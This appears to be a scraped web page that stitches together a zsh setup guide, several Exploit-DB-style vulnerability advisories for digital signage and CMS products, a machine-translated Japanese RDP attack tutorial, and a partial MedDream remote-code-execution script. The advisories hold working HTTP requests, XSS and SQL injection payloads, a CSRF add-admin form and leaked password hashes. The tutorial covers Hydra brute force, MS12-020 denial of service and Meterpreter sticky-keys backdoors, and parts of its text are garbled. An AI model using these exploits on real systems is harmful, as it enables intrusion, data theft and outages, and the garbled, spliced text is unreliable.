HireHackking

The Centos terminal is too simple to use. I thought about changing to zsh terminal and matching the theme of oh my zsh. So create a different terminal. Installing ZSH We can use the yum command or source code to compile and install. (yum) If installed, the zsh version may be lower. Many themes require higher versions of zsh, so I am using source code installation here. First, we go to zsh's official website to download the latest version of zsh (http://zsh.sourceforge.net/Arc/source.html) # download wget https://sourceforge.net/projects/zsh/files/zsh/5.9/zsh-5.9.tar.xz # Uncompression tar xvf zsh-5.9.tar.xz cd zsh-5.9 #Compile and install ./configure make make install After the compilation and installation, you need to add zsh to /etc/shells vim /etc/shells #Add content as follows /usr/local/bin/zsh The purpose of the above command is to add zsh to the shell environment. Pay attention to the road strength of zsh. If you are not sure, you can check it through the whereis zsh command. At this point, our zsh installation is completed. Next we need to install oh-my-zsh Installing oh-my-zsh Project address: https://github.com/ohmyzsh/ohmyzsh One-click installation sh -c '$(wget -O- https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)' After the installation is completed, you will be asked whether you use zsh as the default shell. Select Y here and press Enter Seeing this interface, the installation of oh-my-zsh is completed Configure oh-my-zsh After the installation is completed, we need to make a simple design for Chinese displays, etc. # Edit configuration file vim ~/.zshrc # Add the following three lines respectively export LC_ALL=en_US.UTF-8 export LANG=en_US.UTF-8 source /etc/profile # Save and update source .zshrc Installing plug-ins zsh has many fun plug-ins. The installed plug-ins are in the ~/.oh-my-zsh/custom/plugins directory by default. Such as our commonly used syntax highlighting, historical command prompts, and path completion. Complete command plugin git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions syntax highlighting plugin git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting Next, we need to put the two downloaded plugins into the zsh configuration file. Edit the plugins=() option of the .zshrc file, and then source .zshrc Installing oh-my-zsh oh-my-zsh comes with many themes, all of which are placed in the ~/.oh-my-zsh/themes directory, and you can change them at will. To change the theme, you only need to replace ZSH_THEME='Theme Name' in the .zshrc file and source ~/.zshrc. The default theme is robbyrussell. We change the theme to: agnoster Final effect Of course, you can also download other topics you like on git.

# Exploit Title: BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated) # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.brightsign.biz # Version: <= 8.2.26 BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated SSRF Vendor: BrightSign, LLC Product web page: https://www.brightsign.biz Affected version: Model: XT, XD, HD, LS Firmware / OS version: <=8.2.26 Summary: BrightSign designs media players and provides free software and cloud networking solutions for the commercial digital signage market worldwide, serving all vertical segments of the marketplace. Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. Tested on: roNodeJS Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5595 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5595.php 01.08.2020 -- PoC: # curl http://10.0.0.17/speedtest?url=127.0.0.1:22

# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - File Delete Path Traversal # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.spinetix.com # Version: <= 8.2.26 SpinetiX Fusion Digital Signage 3.4.8 File Backup/Delete Path Traversal Vendor: SpinetiX AG Product web page: https://www.spinetix.com Affected version: <= 3.4.8 (1.0.36274) Summary: At SpinetiX we inspire businesses to unlock the potential of their story. We believe in the power of digital signage as a dynamic new storytelling platform to engage with people. For more than 13 years, we have been constantly innovating to deliver cutting-edge digital signage solutions that help our customers shine. Fusion is a built-in content management application accessible from a standard web browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does not require any additional license, cost, or software installation. Desc: The application suffers from an authenticated path traversal vulnerability. Input passed via several parameters in index.php script is not properly verified before being used to create and delete files. This can be exploited to write backup files to an arbitrary location and/or delete arbitrary files via traversal attacks. Tested on: Apache 2.2.34 PHP/5.3.18-2 Linux 2.6.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5594 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5594.php 03.08.2020 -- File Backup Path Traversal: --------------------------- POST /fusion/index.php?r=backup/create HTTP/1.1 Host: 192.168.1.1 Content-Length: 62 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mooshoo/1.2 Content-Type: application/x-www-form-urlencoded Origin: http://192.168.1.1 Referer: http://192.168.1.1/fusion/index.php?r=settings/settings Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: fusionsess=vb5se309b2seig780p47ch0pn1 Connection: close SystemBackup%5Bname%5D=..%2Ftest&SystemBackup%5Bbackupall%5D=0 File Delete (test.7z) Path Traversal: ------------------------------------- GET /fusion/index.php?r=backup/delete&id=backup%3A../test&_=1600981467420 HTTP/1.1 Host: 192.168.1.1 Arbitrary File Delete Null Terminated String Extension Bypass Path Traversal: ----------------------------------------------------------------------------- GET /fusion/index.php?r=backup/delete&id=backup%3A../scripts/layouttheme.js%00&_=1600981467420 HTTP/1.1 Host: 192.168.1.1 Arbitrary Image Delete: ----------------------- GET /fusion/index.php?r=files/delete&id=image%3A../dirtysecret.svg&_=1601128841154 HTTP/1.1 Host: 192.168.1.1

# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.spinetix.com # Version: <= 8.2.26 SpinetiX Fusion Digital Signage 3.4.8 Username Enumeration Weakness Vendor: SpinetiX AG Product web page: https://www.spinetix.com Affected version: <= 3.4.8 (1.0.36274) Summary: At SpinetiX we inspire businesses to unlock the potential of their story. We believe in the power of digital signage as a dynamic new storytelling platform to engage with people. For more than 13 years, we have been constantly innovating to deliver cutting-edge digital signage solutions that help our customers shine. Fusion is a built-in content management application accessible from a standard web browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does not require any additional license, cost, or software installation. Desc: The weakness is caused due to the login script and how it verifies provided credentials. Attacker can use this weakness to enumerate valid users on the affected node. Tested on: Apache 2.2.34 PHP/5.3.18-2 Linux 2.6.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5591 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5591.php 03.08.2020 -- POST /fusion/index.php?r=users/login HTTP/1.1 Host: 192.168.1.1 User[username]=NonExisting&User[password]=blah&User[rememberMe]=0&yt0.x=0&yt0.y=0 Response: Username is incorrect. HTML: <div class="user_password login"><div class="errorLogin">Username is incorrect.</div> --- POST /fusion/index.php?r=users/login HTTP/1.1 Host: 192.168.1.1 User[username]=admin&User[password]=blah&User[rememberMe]=0&yt0.x=0&yt0.y=0 Response: Password is incorrect. HTML: <div class="user_password login"><div class="errorLogin">Password is incorrect.</div>

# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin) # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.spinetix.com # Version: <= 8.2.26 SpinetiX Fusion Digital Signage 3.4.8 CSRF Add Admin Exploit Vendor: SpinetiX AG Product web page: https://www.spinetix.com Affected version: <= 3.4.8 (1.0.36274) Summary: At SpinetiX we inspire businesses to unlock the potential of their story. We believe in the power of digital signage as a dynamic new storytelling platform to engage with people. For more than 13 years, we have been constantly innovating to deliver cutting-edge digital signage solutions that help our customers shine. Fusion is a built-in content management application accessible from a standard web browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does not require any additional license, cost, or software installation. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache 2.2.34 PHP/5.3.18-2 Linux 2.6.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5592 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5592.php 03.08.2020 -- <html> <body> <script>history.pushState('', '', '/index.php?r=settings/settings')</script> <form action="http://192.168.1.1/fusion/index.php?r=users/create" method="POST"> <input type="hidden" name="User[username]" value="" /> <input type="hidden" name="User[username]" value="ZSL" /> <input type="hidden" name="User[new_password]" value="testingus" /> <input type="hidden" name="User[repeat_password]" value="testingus" /> <input type="hidden" name="User[userRoles]" value="Administrator" /> <input type="submit" value="Forge!" /> </form> </body> </html>

# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.spinetix.com # Version: <= 8.2.26 SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure Vendor: SpinetiX AG Product web page: https://www.spinetix.com Affected version: <= 3.4.8 (1.0.36274) Summary: At SpinetiX we inspire businesses to unlock the potential of their story. We believe in the power of digital signage as a dynamic new storytelling platform to engage with people. For more than 13 years, we have been constantly innovating to deliver cutting-edge digital signage solutions that help our customers shine. Fusion is a built-in content management application accessible from a standard web browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does not require any additional license, cost, or software installation. Desc: The application is vulnerable to unauthenticated database download and information disclosure vulnerability. This can enable an attacker to disclose sensitive information resulting in authentication bypass, session hijacking and full system control. Tested on: Apache 2.2.34 PHP/5.3.18-2 Linux 2.6.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5593 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5593.php 03.08.2020 -- Request: -------- GET /content/files/backups/ HTTP/1.0 Host: 192.168.1.1 Response: --------- HTTP/1.1 200 OK Date: Wed, 26 Aug 2020 15:57:40 GMT Server: Apache/2.2.22 (Unix) X-spinetix-firmware: 3.0.6-1.0.21932 X-raperca-version: 3.0.6-1.0.21912 X-spinetix-serial: 001d400027b8 X-spinetix-hw: BonsaiT Content-Length: 636 Connection: close Content-Type: text/html;charset=UTF-8 Index of /content/files/backups Name Last modified Size Description Parent Directory - Custom1337Name.7z 25-Aug-2020 10:06 1.0M Extracting the .7z shows userpwd.txt file, cat userpwd.txt: admin:e10adc3949ba59abbe56e057f20f883e:file,program,activate,layout,playlist,model,slide,edit,admin::0 testingus:b874da212a62786181c66c5bbaabf425:file,program,activate,layout,playlist,model,slide,edit,admin:se:1

0x00はじめに この記事では、4つのシナリオでリモートデスクトップ浸透テスト手法について説明します。この攻撃方法により、RDPサービスをアクティブにする際に、攻撃者がターゲットシステムをさまざまな状況下で攻撃する方法と、管理者がどのような主要な防御を攻撃するかを取得しようとします。 「ターミナルサービスクライアント」とも呼ばれるリモートデスクトッププロトコル（RDP）は、Microsoftが開発した独自のプロトコルであり、ネットワーク接続を介して別のコンピューターにリモートログするためのグラフィカルインターフェイスをユーザーに提供します。 RDPサーバーはWindowsオペレーティングシステムに組み込まれています。デフォルトでは、サーバーはTCPポート3389に耳を傾けます。 0x01 RDPサービス攻撃 1.RDPブルートフォース攻撃 始めましょう！管理者がシステム内のリモートデスクトップサービスがローカルネットワーク接続を可能にしたと仮定します。 1.1 NMAPを使用してRDP攻撃者がNMAPを使用して、ポート3389が開かれているかどうかを確認できます。 RDPの浸透については、NMAPを使用してターゲットシステム（192.168.0.102）をスキャンして、Open RDPのポートを取得します。 NMAP -P 3389 192.168.0.102リモートデスクトップサービスが許可されている場合、NMAPは下の図に示すように、ポート3389として開くステータスを表示します。 1.2。 RDPへのブルートフォース攻撃RDPに接続するには、認証された接続としてログイン資格情報が常に必要です。有効なユーザー資格情報はユーザー名とパスワードを入力できますが、無効なユーザー（攻撃者）は正しいログイン資格情報を推測できないため、ブルートフォース攻撃を通じてログイン資格情報を取得する必要があります。 Hydraを使用して、RDPに対するブルートフォース攻撃を実証しています。 Hydra：複数のプロトコル攻撃をサポートする並列ログインクラッカーです。それは非常に高速で柔軟であり、新しいモジュールは簡単に追加できます。 Kali Linuxでターミナルを開き、次のコマンドを入力します。 Hydra -v -f -l /root/desktop/user.txt -p /root/desktop/dict.txt rdp：////192.168.0.102以下のスクリーンショットから、ユーザー名：Ignite and Password：123456は、brute -fute -fute -fute -fute -fute -futeを介してaightを介してaightを使用しています。リモートデスクトップサービスにログインする攻撃者。 2。 DOS攻撃のためにポート3389をスキャン 何度も、ホストがRDP攻撃に対して脆弱かどうかを判断するために、攻撃者はMS12-020チェックを使用して脆弱性をテストします。 Kali Linuxの下のMetasploitフレームワークでコマンド端子を開き、次のコマンドを入力して脆弱性をスキャンします。 補助/スキャナー/RDP/MS12_020_CHECKMSF AUXILYARY（MS12_020_Check）Set Rhosts 192.168.0.102MSF Auxiliary（MS12_020_Check）Set Rport 3389msf Auxiliary（MS12_020_Check）exploit from his his from scrienこれで、Googleを使用して、攻撃の脆弱性のPOCを見つけることができます。 攻撃がターゲットポート3389がMS12-020攻撃に対して脆弱であることがわかると、MS12-020_MaxChannelidsを使用して攻撃が試みられます。これにより、ターゲットシステムに対するDOS攻撃が発生します。 次に、DOS攻撃の次のコマンドを入力します。これにより、ターゲットシステムがブルースクリーンになります。 補助/DOS/Windows/RDP/MS12_020_MAXCHANNELIDSMSMSMSMSF AUXILIARY（MS12_020_MAXCHANNELIDS）SET RHOST 192.168.0.102MSF補助（MS12_020_MAXCHANNELIDS）セットRHOST 3389MSF補助（MS12_020202020202020202020202020202020202020202020202020202020202エクスプロイト 次の図から、目標は、いくつかの問題のためにシステムがシャットダウンしていることであることがわかります。 DOS攻撃執行者は、多くの場合、銀行やクレジットカードの支払いゲートウェイなどのハイエンドWebサーバーでホストされているサイトまたはサービスをターゲットにし、ターゲットユーザーがインターネットに接続されたホストサービスを一時的または無期限に中断することにより、マシンやネットワークリソースを使用できません。 3.被害者PCのEnable RDP 攻撃者がRDPサービスを有効にしない被害者システムを攻撃した場合、攻撃者はRapid 7が構築した侵入後モジュールを使用してRDPサービスを有効にすることができます。 これを行うには、ターゲットシステムにリバウンドシェルが必要です。次の図から、ターゲットシステムのリバウンドシェルが取得されていることがわかります。 ここでは、MeterPreterのセッション1を取得し、バイパスのセッション2から管理権限を取得します。 次に、次のコマンドを入力して、浸透後リバウンドシェルを生成してRDPサービスを有効にします post/windows/manage_rdpmsf post（enable_rdp）sessionsmsf post（enable_rdp）Exploit を使用します このモジュールは、適切な権限を持つ「粘着性キー」攻撃をセッションに適用できます。この攻撃は、UIレベルの相互作用を使用して、RDPログイン画面またはUAC確認ダイアログでシステムシェルを取得する方法を提供します。 Post/Windows/manage/sticky_keysmsf post（sticky_keys）セッション2msf post（sticky_keys）Exploit を使用します 次のコマンドを使用して、リモートデスクトップに接続します。 rdesktop 192.168.0.102 ログイン資格情報の提出が必要になりますが、わからないので、下の図に示すように、シフトキーを5回連続して押してRDPのコマンド端子を取得できるように、上記のスティックキー攻撃を起動する必要があります。 4。 RDPを有効にする別の方法 被害者ホストシステムのメータープレターセッションを取得した後、RDPサービスのコマンドと選択した設定資格情報を有効にします。 MeterPreter Run GetGui-E-U RAAZ-P 1234次の図から、「リモートデスクトップユーザー」と「管理者」にアクセスするために、ユーザー名RAAZとパスワード1234が追加されていることがわかります。これで、作成されたユーザーを使用して、次のようにコマンドでログインできます。RDESKTOP192.168.0.102 ログインするには、ユーザー名raazとパスワード1234を入力します これで、システムにリモートでログインしました。 0x02 RDP攻撃防御 1。セキュリティポリシーを追加して、ブルートフォースを防止します 管理者は、アカウントロックポリシーを使用して、ブルートフォース攻撃からネットワークを保護できます。セキュリティセットアカウントポリシーの下で次のポリシーを構成します。アカウントロック期間：管理者によって自動的にロック解除またはリセットされるまで、ロックされたアカウント保持期間を定義するために使用されるポリシー。ユーザーがアカウントロックのしきい値で設定されたログイン試行を超えると、アカウント指定された時間をロックします。 アカウントロックのしきい値：失敗したログイン試行の数を定義するポリシーで、アカウントロック期間のために指定された期間にアカウントをロックします。アカウントに最大数の試行をログインすることができます。 ロックされたアカウントロックカウンター：ログインの試行が失敗した後に合格しなければならない期間を定義するポリシー。リセット時間は、アカウントロック時間以下でなければなりません。 次の例の設定：アカウントロック時間：30分 アカウントロックのしきい値：2無効なログイン試行 ロックされたアカウントロック計算機：30分後 試行回数がアカウントロックのしきい値よりも大きい場合、攻撃者がロックされる可能性があります。 ポート3389でのブルートフォース攻撃により、アカウントロック戦略を再度テストします。 Hydra -v -f -l Ignite -p/root/desktop/dict.txt rdp：//192.168.0.0.102攻撃者がユーザー名とパスワードを取得すると、間違いなくログインしますが、見ることができるように、パスワードをクラックするには2回以上かかります。 リモートデスクトップにログインして確認しましょう。 コマンド端子を開き、「rdesktop 192.168.0.102」を入力します。ターゲット画面を取得したら、爆破されたユーザー名とパスワードを入力します。以下のスクリーンショットから、上記のユーザー名とパスワードを入力したことがわかります: 123456 攻撃者が資格情報を送信すると、次の図に示すように、現在のアカウントがロックされており、ログインできないというメッセージが表示されます。ユーザーのアカウントに30分間ロックされるため、管理者は誰かがリモートデスクトップに違法にアクセスしようとしていることを知っています。このようにして、私たちはブルートフォース攻撃から防御し、不正アクセスを防ぐことができます。 2。ポート変更 システムセキュリティを改善するために別のポートでポート3389を転送できますが、レジストリエディターを介してウィンドウオペレーティングシステムの次の場所を閲覧できます。 hkey_local_machine \ system \ currentControlset \ control \ターミナルサーバー\ winstations \ rdp-tcp次の図から、右パネルでポート番号が選択されていることがわかります。 ポートを3389から特定のポート番号に変更すると、32ビット値を編集できるDWORDを編集するウィンドウが表示されます。デフォルトでは、3389の16進価値であるD3Dが表示されます。3389値を選択した別の値（3314など）に置き換え、1ヘクサデシマルを選択してカーディナリティとして3314をCF2に変換します。 次の図から、ポート3314が開いていることがわかります。 3。システム自身のファイアウォールを介してRDPを保護します 高度な設定を備えたファイアウォールのパネルを開き、その中にリモートデスクトップ（TCP-IN）構成に移動して、ファイアウォールの設定に変更を加えることでセキュリティフィルターを追加するように設定します。 特定のIPからトラフィックを許可した後、ウィンドウを開いてプロパティを変更し、[範囲]オプションをクリックします。ここでは、ローカルおよびリモートIPアドレスの接続タイプの2つのパネルを取得します。 リモートIPアドレスで、特定のIPアドレスの2番目のオプションを選択し、次の図に示すように、リモートデスクトップサービスへの接続を許可するIPを入力します。 他のIPSからのすべてのトラフィックをブロックし、ネットワークセキュリティを改善して、あらゆる種類の攻撃から保護します。

# Exploit Title: MonoCMS Blog 1.0 - Arbitrary File Deletion (Authenticated) # Date: 2020-09-20 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: https://monocms.com/download # Software Link: https://monocms.com/download # Version: 1.0 # Tested On: Windows 10 (XAMPP) # CVE: N/A Proof of Concept: 1. In the upload images page, make a request to delete an already uploaded image. If no image present, upload an image and then make a request to delete that image. 2. Notice the Request URL <ip>/base_path_to_cms/uploads?delimg=../../../../../Temp/Copy.txt This deletes the file ‘copy.txt’ from C:\Temp 3. Use simple directory traversals to delete arbitrary files. Note: php files can be unlinked and not deleted. =========================================================================================================================== ########################################################################################################################### =========================================================================================================================== # Exploit Title: MonoCMS Blog - Account Takeover (CSRF) # Date: September 29th, 2020 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: https://monocms.com/download # Software Link: https://monocms.com/download # Version: 1.0 # Tested On: Windows 10 (XAMPP) # CVE: CVE-2020-25986 Proof of Concept: Login using a test user (attacker). Make a password change request, and enter a new password and then intercept the request (in BurpSuite). Generate a CSRF PoC. Save the HTML code in an html file. Login as another user (victim), open the CSRF-PoC html file, and click on submit request. Victim user’s password will be changed. =========================================================================================================================== ########################################################################################################################### =========================================================================================================================== # Exploit Title: MonoCMS Blog - Sensitive Information Disclosure (Hardcoded Credentials) # Date: September 29th, 2020 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: https://monocms.com/download # Software Link: https://monocms.com/download # Version: 1.0 # Tested On: Windows 10 (XAMPP) # CVE: CVE-2020-25987 Proof of Concept: Hard-coded admin and user hashes can be found in the “log.xml” file in the source-code files for MonoCMS Blog. Hash type is bcrypt and hashcat mode 3200 can be used to crack the hash.

# Exploit Title: CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) # Google Dork: - # Date: 2020-09-29 # Exploit Author: Roel van Beurden # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip # Version: 2.2.14 # Tested on: Linux Ubuntu 18.04 # CVE: CVE-2020-24860 1. Description: ---------------------- CMS Made Simple 2.2.14 allows an authenticated user with access to the Content Manager to edit content and put persistent XSS payload in the affected text fields. The user can get cookies from every authenticated user who visits the website. 2. Affected parameters: ---------------------- Content > Content Manager > Edit some page > Logic (tab) > Page Specific Metadata (text field) Content > Content Manager > Edit some page > Logic (tab) > Smart data or logic that is specific to this page (text field) 3: Example payload: ---------------------- <script>alert(document.cookie);</script> 4: Exploitation demo: ---------------------- youtube.com/watch?v=M6D7DmmjLak&t=22s

# Exploit Title: GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting (Authenticated) # Google Dork: - # Date: 2020-09-29 # Exploit Author: Roel van Beurden # Vendor Homepage: http://get-simple.info # Software Link: http://get-simple.info/download # Version: 3.3.16 # Tested on: Linux Ubuntu 18.04 # CVE: N/A 1. Description: ---------------------- GetSimple CMS 3.3.16 allows in parameter 'permalink' on the Settings page persistent Cross Site Scripting which is executed when you create and open a new page. 3. Affected parameter: ---------------------- 'permalink' on /admin/settings.php 3. Exploitation steps: ---------------------- 1: Create a new page 2: Go to Settings on the right top of the page 3: Add XSS payload to "Custom Permalink Structure" text field 4: Save Settings 5: Go to the tab 'pages' to trigger the XSS alert popup 3: Example payload: ---------------------- "><img src=x onerror=alert('XSS')> 4: Burp Request: ---------------------- POST /GetSimpleCMS-3.3.16/admin/settings.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/GetSimpleCMS-3.3.16/admin/settings.php Content-Type: application/x-www-form-urlencoded Content-Length: 349 Connection: close Cookie: __atuvc=22%7C39; __atuvs=5f689d4d88949892015; GS_ADMIN_USERNAME=admin; d46405c5e4a3aa8c65850d4fa6ba75e926569261=1995ba85457ab3e86fa5e01f9ed5267cf9775880 Upgrade-Insecure-Requests: 1 nonce=c4577f17fac90ca1b8306ce48571c27a0a7923ec&sitename=GetSimple+Test+VM&siteurl=http%3A%2F%2F127.0.0.1%2FGetSimpleCMS-3.3.16%2F&prettyurls=1&permalink=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3E&user=admin&email=admin%40example.org&name=&timezone=&lang=en_US&show_htmleditor=1&sitepwd=&sitepwd_confirm=&submitted=Save+Settings 5: Exploitation demo: ---------------------- https://www.youtube.com/watch?v=8IMfD5KGt_U

# Exploit Title: WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated) # Google Dork: - # Date: 2020-09-20 # Exploit Author: Roel van Beurden # Vendor Homepage: https://websitebaker.org # Software Link: https://wiki.websitebaker.org/doku.php/en/downloads # Version: 2.12.2 # Tested on: Linux Ubuntu 18.04 # CVE: CVE-2020-25990 1. Description: ---------------------- WebsiteBaker 2.12.2 allows SQL Injection via parameter 'display_name' in /websitebaker/admin/preferences/save.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from /websitebaker/admin/preferences/save.php and save it like burp.req Then run SQLmap to extract the data from the database: sqlmap -r burp.req --risk=3 --level=5 --dbs --random-agent 3. Example payload: ---------------------- display_name=Administrator" AND (SELECT 9637 FROM (SELECT(SLEEP(5)))ExGN)-- Cspz&language=EN&timezone=system_default&date_format=M d Y&time_format=g:i A&email=admin@example.com&new_password_1=&new_password_2=&current_password=&submit=Save&dd114892c1676ce3=j_5rdRnI_TarPQu7QmVVuw 4. Burpsuite request: ---------------------- POST /websitebaker/admin/preferences/save.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/websitebaker/admin/preferences/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 228 Connection: close Cookie: wb-8123-sid=otfjsmqu8vljs9737crkcm8nec Upgrade-Insecure-Requests: 1 display_name=Administrator&language=EN&timezone=system_default&date_format=M+d+Y&time_format=g%3Ai+A&email=admin%40example.com&new_password_1=&new_password_2=&current_password=&submit=Save&dd114892c1676ce3=j_5rdRnI_TarPQu7QmVVuw

# Exploit Title: Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting # Exploit Author: Alperen Ergel # Web Site: https://alperenae.gitbook.io/ # Contact: @alperen_ae (IG) @alpren_ae (TW) # Software Homepage: https://www.typesettercms.com/ # Version : 5.1 # Tested on: windows 10 / xammp # Category: WebApp # Google Dork: intext:"Powered by Typesetter" # Date: 2020-09-29 # CVE :- ######## Description ######## # # 1-) Loggin administrator page # # 2-) Edit under Settings > Configration > General Settings > title and add payload # # 3-) Back to web site then will be work payload # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /typesetter/Admin/Configuration HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/typesetter/Admin/Configuration Content-Type: application/x-www-form-urlencoded Content-Length: 1134 Connection: close Cookie: g=2; gpEasy_bf7bf352c176=zM0WimE3PVwK7QeQaaK88BgSGnOYXfD7d5y7K815; __gads=ID=6078ee5aea85c9aa:T=1600515511:S=ALNI_MaaxxD3-kKm1mS0BDTLxQUBoD-1bw; _ga=GA1.2.862675868.1600515711; __atuvc=3%7C38%2C1%7C39%2C3%7C40; wires_challenge=afzBq%2FHPKhRGhabSML1Jc738JzKxfr4w; _gid=GA1.2.50322462.1601402080 Upgrade-Insecure-Requests: 1 verified=1fe7b252b3aa6f0a3ef412e4d9556f34bce5d15f0433057805e74c41305a2cab2641a4ec81988341275dab33e5f92e8ebd3cf70766f8b9718f835d1e4f5ec78d &title=%3Cscript%3Ealert%28%22THIS+IS+XSS+PAYLOAD%22%29%3B%3C%2Fscript%3E&keywords=&desc=&aaa=Save+%28All%29&colorbox_style=example1&gallery_legacy_style=false&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true &showgplink=false&showgplink=true&maximgarea=2073600&resize_images=false&resize_images=true&preserve_icc_profiles=false&preserve_icc_profiles=true&preserve_image_metadata=false&preserve_image_metadata=true&maxthumbsize=300&maxthumbheight=&thumbskeepaspect=false&auto_redir=90&history_limit=30&HTML_Tidy=&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&space_char=-&toemail=cms%40gfdk.org&toname=dsadasda&from_address=AutomatedSender%40localhost&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config

#!/usr/bin/python # # # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated) # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated) # Date: 2020-10-01 # Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/ # Vendor Homepage: https://www.softneta.com # Version: 6.8.3.751 # Tested On: Windows 2016 # # # Timeline # 05-02-20: Submitted incident through email, immediate response # 05-04-20: Issue resolved, New version released 6.8.3.1.751 # # Note: Core Vulnerability resides in another product which has been remediated as well # ##PoC## # # 1. create one line php shell to call commands # 2. run script on attacking machine # 3. enter parameters; IP, filename, username, password, command # # # root@kali:~# python meddream.py # Enter IP Address: 192.168.0.223 # Enter payload filename + .php: cmd.php # Enter Username: user1 # Enter Password: SoSecure!! # Enter command: whoami # 212357 # <pre>nt authority\system # </pre> # http://192.168.0.223/Pacs/upload/20201001-212357--cmd.php?cmd=whoami # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # # from urllib2 import urlopen from bs4 import BeautifulSoup import requests import sys import time from datetime import datetime, timedelta ip_addr = raw_input("Enter IP Address: ") user_file = raw_input("Enter payload filename + .php: ") uname = raw_input("Enter Username: ") pword = raw_input("Enter Password: ") cmd = raw_input("Enter command: ") URL1= 'http://' + ip_addr + '/Pacs/login.php' URL2= 'http://' + ip_addr + '/Pacs/authenticate.php' URL3= 'http://' + ip_addr + '/Pacs/uploadImage.php' def main(): session = requests.Session() site = session.get(URL1) soup = BeautifulSoup(site.content, "html.parser") antispam = soup.find("input", {"name":"formAntiSpam"})["value"] dbname = soup.find("input", {"name":"aetitle"})["value"] 